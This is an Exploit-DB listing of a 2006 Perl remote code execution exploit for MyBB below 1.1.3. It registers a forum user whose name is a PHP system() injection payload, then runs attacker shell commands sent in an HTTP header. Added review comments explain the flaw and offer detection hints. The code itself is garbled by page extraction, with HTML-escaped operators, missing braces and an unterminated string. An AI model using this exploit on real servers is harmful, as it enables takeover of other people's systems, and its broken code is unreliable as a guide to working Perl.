MyBulletinBoard MyBB < 1.1.3 - Remote Code Execution Exploit

ID EDB-ID:1909
Type exploitdb
Reporter Javier Olascoaga
Modified 2006-06-13T00:00:00


MyBulletinBoard (MyBB) < 1.1.3 Remote Code Execution Exploit. CVE-2006-2908. Webapps exploit for php platform

# Tue Jun 13 12:37:12 CEST 2006
# Exploit HOWTO - read this before flood my Inbox you bitch!
# - First you need to create the special user to do this use:
#	./ --host= --dir=/mybb -1
#   this step needs a graphic confirmation so the exploit writes a file 
#   in /tmp/file.png, you need to
#   see this img and put the text into the prompt. If everything is ok, 
#   you'll have a new valid user created.
# * There is a file mybibi_out.html where the exploit writes the output 
#   for debugging.
# - After you have created the exploit or if you have a valid non common 
#   user, you can execute shell commands.
# 	* Sometimes you have to change the thread Id, --tid is your friend ;)
#	* Don't forget to change the email. You MUST activate the account.
#	* Mejor karate aun dentro ti.
#	* If the admin has the username length < 28 this exploit doesn't work
# Greetz to !dSR ppl and unsec
# 514 still r0xing!

# user config.
# user config.
# Name of the custom HTTP request header that carries the command; the PHP
# payload built further down reads it via getenv(HTTP_<uservar>), so it becomes
# part of the registered username. "Don't use large vars" presumably because the
# whole payload has to fit the board's username length limit (the HOWTO above
# mentions 28) -- TODO confirm.
my $uservar = "C"; # don't use large vars.
# Fixed credential shared by every copy of this tool.
my $password = "514r0x";
# NOTE(review): this literal is unterminated as listed -- the backslash escapes
# the closing quote -- so the address was evidently lost during page extraction
# and the file does not compile as shown.
my $email = "514\";

use LWP::UserAgent;
use HTTP::Cookies;
use LWP::Simple;
use HTTP::Request::Common "POST";
use HTTP::Response;
use Getopt::Long;
use strict;

# Autoflush STDOUT so the interactive prompt appears before the blocking read.
$| = 1;   # you can choose this or another one.

my ($proxy,$proxy_user,$proxy_pass, $username);
my ($host,$debug,$dir, $command, $del, $first_time, $tid);
# NOTE(review): $tid is declared a second time here; under "use strict" that is
# only a "masks earlier declaration" warning, and the default forum id of 2 is
# the one that survives. $command is not referenced in the lines shown.
my ($logged, $tid) = (0, 2);

# The registered username *is* the payload: it is shaped to close a
# single-quoted PHP string, concatenate a system() call whose argument is the
# request header named in $uservar (exposed to PHP as HTTP_<uservar>), and
# re-open the string. This is the username-handling flaw fixed in MyBB 1.1.3
# (CVE-2006-2908, see the header). For defenders, a username of this shape in
# the board's user table is a direct indicator that the flaw was exercised.
$username = "'.system(getenv(HTTP_".$uservar.")).'";

# Command-line options. "1" is the first-run flag that triggers create_user();
# "tid" is, despite the name, the forum id sent as "fid" when posting; "delete"
# sets $del, which is not used anywhere in the lines shown.
# NOTE(review): "=&gt;" throughout this listing is an HTML-escaped "=>" left
# over from page extraction; the code as shown is not valid Perl.
my $options = GetOptions (
  'host=s'	      =&gt; \$host, 
  'dir=s'	      =&gt; \$dir,
  'proxy=s'           =&gt; \$proxy,
  'proxy_user=s'      =&gt; \$proxy_user,
  'proxy_pass=s'      =&gt; \$proxy_pass,
  'debug'             =&gt; \$debug,
  '1'		      =&gt; \$first_time,
  'tid=s'	      =&gt; \$tid,
  'delete'	      =&gt; \$del);

# Usage is printed when --host is missing. NOTE(review): "&help" without
# parentheses passes this scope's current @_ through to the sub, and whether
# help() exits cannot be seen here because its closing brace is missing from
# the listing.
&help unless ($host); # please don't try this at home.

$dir = "/" unless($dir);
print "$host - $dir\n";
# Prepend a scheme when the operator supplied a bare hostname.
# NOTE(review): the brace closing this if-block is missing from the listing,
# so everything below reads as nested inside it.
if ($host !~ /^http/) {
	$host = "http://".$host;

# Presumably relies on LWP::UserAgent having loaded LWP::Debug; none of the
# visible "use" lines imports it -- TODO confirm.
LWP::Debug::level('+') if $debug;
my ($res, $req);

# The cookie jar is a per-process file in the current directory (named after
# the PID); nothing in the visible code removes it, so the session cookie is
# left on disk. The User-Agent is a static string that makes the traffic
# trivially recognisable in web-server logs or an IDS.
my $ua = new LWP::UserAgent(
           cookie_jar=&gt; { file =&gt; "$$.cookie" });
$ua-&gt;agent("Mothilla/5.0 (THIS IS AN EXPLOIT. IDS, PLZ, Gr4b ME!!!");
$ua-&gt;proxy(['http'] =&gt; $proxy) if $proxy;
# NOTE(review): $req is still undef at this point (declared two lines up and
# never assigned), so a run with --proxy_user would die on a method call on
# undef before anything else happens.
$req-&gt;proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;

create_user() if $first_time;

# Interactive command loop. Only its opening lines survived extraction: the
# read/dispatch body and both closing braces are missing, so the subs that
# follow appear nested inside this loop as listed.
while () {
		login() if !$logged;

		print "mybibi&gt; "; # lost connection
		while(&lt;STDIN&gt;) {

# Sends one command to the board. The command travels in the custom request
# header named by $uservar; the form body is an ordinary "preview post" to
# newthread.php that exists only to make the board evaluate the injected
# username. Whatever the server emits before its <!DOCTYPE is printed as the
# command output. From a detection standpoint this is a POST with a one-letter
# custom header plus the static User-Agent set on $ua.
# NOTE(review): naming a sub "send" collides with the CORE::send builtin; a
# plain send(...) call resolves to the builtin (Perl warns "Ambiguous call
# resolved as CORE::send()") unless written as &send -- the call site is not
# in the listing. The "]" ending the POST list and both closing braces are
# also missing as listed.
sub send  {
	chomp (my $cmd = shift);
	my $h = $host.$dir."/newthread.php";
	my $req = POST $h, [
		'subject' =&gt; '514',
		'message' =&gt; '/slap 514',
		'previewpost' =&gt; 'Preview Post',
		'action' =&gt; 'do_newthread',
		'fid' =&gt; $tid,
		'posthash' =&gt; 'e0561b22fe5fdf3526eabdbddb221caa'
	$req-&gt;header($uservar =&gt; $cmd);
	print $req-&gt;as_string() if $debug;
	my $res = $ua-&gt;request($req);
	# The board's permission-denied text doubles as the "wrong forum id" signal.
	if ($res-&gt;content =~ /You may not post in this/) {
		print "[!] don't have perms to post. Change the Forum ID\n";
	} else {
		# Non-greedy capture of everything before the document type declaration.
		my ($data) = $res-&gt;content =~ m/(.*?)\&lt;\!DOCT/is;
		print $data;

# Logs in as the crafted user with a normal member.php form post and sets the
# file-level $logged flag on success; the session is kept by the cookie jar on
# $ua. Success is detected by scraping the board's confirmation text, so a
# customised template would be reported as a failed login.
# NOTE(review): the "]" ending the POST list and both closing braces are
# missing from the listing.
sub login {
	my $h  = $host.$dir."/member.php";
	my $req = POST $h,[
		'username' =&gt; $username,
		'password' =&gt; $password,
		'submit' =&gt; 'Login',
		'action' =&gt; 'do_login'
	my $res = $ua-&gt;request($req);
	if ($res-&gt;content =~ /You have successfully been logged/is) {
		print "[*] Login succesful!\n";
		$logged = 1;
	} else {
		print "[!] Error login-in\n";

# Prints usage. Reached via "&help" when --host is absent; no exit is visible
# here and the sub's closing brace is missing from the listing, so whether the
# script stops after printing cannot be confirmed from this page. Note that $0
# already carries the path the script was invoked with, so "./$0" may double it.
sub help {
    print "Syntax: ./$0 --host=url --dir=/mybb [options] -1 --tid=2\n";
    print "\t--proxy (http), --proxy_user, --proxy_pass\n";
    print "\t--debug\n";
    print "the default directory is /\n";
    print "\nExample\n";
    print "bash# $0 --host=http(s)://\n";
    print "\n";

# First-run step (-1): registers the payload username through the board's
# ordinary registration flow. It fetches the registration page, posts the
# agreement, pulls the CAPTCHA image URL out of the HTML, saves the image to
# /tmp/file.png for the operator to transcribe, then posts the registration
# form with the transcribed text and the image hash. The final response is
# dumped to mybibi_out.html for debugging; activation is by e-mail (HOWTO).
# Uses the file-level $req/$res declared near the top and also redeclares
# "my $req" three times, which "use strict" only warns about.
# NOTE(review): the "]" terminators of the POST lists, the brace closing the
# if-block around the file write, and the sub's own closing brace are all
# missing from the listing.
sub create_user {
	# firs we need to get the img.
	my  $h = $host.$dir."/member.php";
	print "Host: $h\n";

	# Initial GET of the registration page; the response body is overwritten
	# below, so only whatever the cookie jar retains from it is used.
	$req = HTTP::Request-&gt;new (GET =&gt; $h."?action=register");
	$res = $ua-&gt;request ($req);

	my $req = POST $h, [
		'action' =&gt; "register",
		'agree' =&gt; "I Agree"
	print $req-&gt;as_string() if $debug;
	$res = $ua-&gt;request($req);

	my $content = $res-&gt;content();
	# NOTE(review): the match result is never checked; if no image.php link is
	# present, $1 is stale or undef and the GET below fetches a bogus URL.
	$content =~ m/.*(image\.php\?action.*?)\".*/is;
	my $img = $1;
	my $req = HTTP::Request-&gt;new (GET =&gt; $host.$dir."/".$img);
	$res = $ua-&gt;request ($req);
	print $req-&gt;as_string();

	if ($res-&gt;content) {
		# NOTE(review): bareword handle and a fixed path in a world-writable
		# directory; a pre-existing file or symlink at /tmp/file.png on the
		# operator's host is followed and truncated. The image is read by a
		# human, never parsed.
		open (TMP, "&gt;/tmp/file.png") or die($!);
		print TMP $res-&gt;content;
		close (TMP);
		print "[*] /tmp/file.png created.\n";

	# The hash is carried in the CAPTCHA URL and must be echoed back with the
	# transcribed text; get_img_str() returns the raw line, so strip newlines.
	my ($hash) = $img =~ m/hash=(.*?)$/;
	my $img_str = get_img_str();
	unlink ("/tmp/file.png");
	$img_str =~ s/\n//g;
	my $req = POST $h, [
		'username' =&gt; $username,
		'password' =&gt; $password,
		'password2' =&gt; $password,
		'email' =&gt; $email,
		'email2' =&gt; $email,
		'imagestring' =&gt; $img_str,
		'imagehash' =&gt; $hash,
		'allownotices' =&gt; 'yes',
		'receivepms' =&gt; 'yes',
		'pmpopup' =&gt; 'no',
		'action' =&gt; "do_register",
		'regsubmit' =&gt; "Submit Registration"
	$res = $ua-&gt;request($req);
	print $req-&gt;as_string() if $debug;

	# NOTE(review): unchecked open on a bareword handle that is never closed, so
	# a write failure here goes unreported.
	open (OUT, "&gt;mybibi_out.html");
	print OUT $res-&gt;content;

	print "Check $email for confirmation or mybibi_out.html if there are some error\n";

# Prompts the operator to transcribe the CAPTCHA saved by create_user() and
# returns the raw STDIN line, newline included (the caller strips it).
# NOTE(review): "()" here is an empty prototype, not a signature; the opening
# brace is missing from the listing along with the closing one. An EOF on
# STDIN yields undef, which the caller would then try to substitute on.
sub get_img_str ()
	print "\nNow I need the text shown in /tmp/file.png: ";
	my $str = &lt;STDIN&gt;;
	return $str;
# Unconditional exit. As listed it directly follows get_img_str(); the braces
# that would place it after the command loop are missing from the page.
exit 0;

# [2006-06-13]